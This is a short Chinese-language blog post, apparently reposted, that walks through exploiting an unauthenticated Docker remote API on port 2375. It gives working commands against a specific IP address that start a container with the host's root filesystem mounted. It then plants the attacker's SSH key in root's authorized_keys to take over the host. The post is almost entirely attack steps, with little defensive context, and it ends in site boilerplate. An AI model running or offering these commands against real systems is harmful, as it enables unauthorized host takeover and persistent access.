perface
一般开放在2375端口
docker remote API未授权访问漏洞,此API主要目的是取代命令执行页面,开放2375监听容器时,会调用这个API。方便docker集群管理和扩展
写入ssh密钥连接
首先发现docker认证漏洞
可以直接执行命令
···
docker -H tcp://47.92.147.38:2375 images
docker -H tcp://47.92.147.38:2375 run -it -v /:/mnt ad080923604a /bin/bash
···
上面两行命令,第一行是为了看现在docker存在的镜像
第二行,则是根据现在有的镜像启动容器,并将容器卷挂载在根目录下
然后反弹shell,即可以直接进入容器的/bin/bash下
而获取到了容器的操作权限,下一步则是获取宿主机的权限,这里我们使用写入ssh,直接进行认证连接
进入vps,生成密钥
ssh-keygen -t rsa # 之后一直回车
cd .ssh
cat 13_rsa.pub #默认名为authorized_keys.pub,我取名为13
将密钥内容写入/mnt/root/.ssh/authorized_keys下
文章来源:https://www.toymoban.com/news/detail-622590.html
echo xxxxxx > autuorized_keys
成功连入文章来源地址https://www.toymoban.com/news/detail-622590.html
到了这里,关于漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!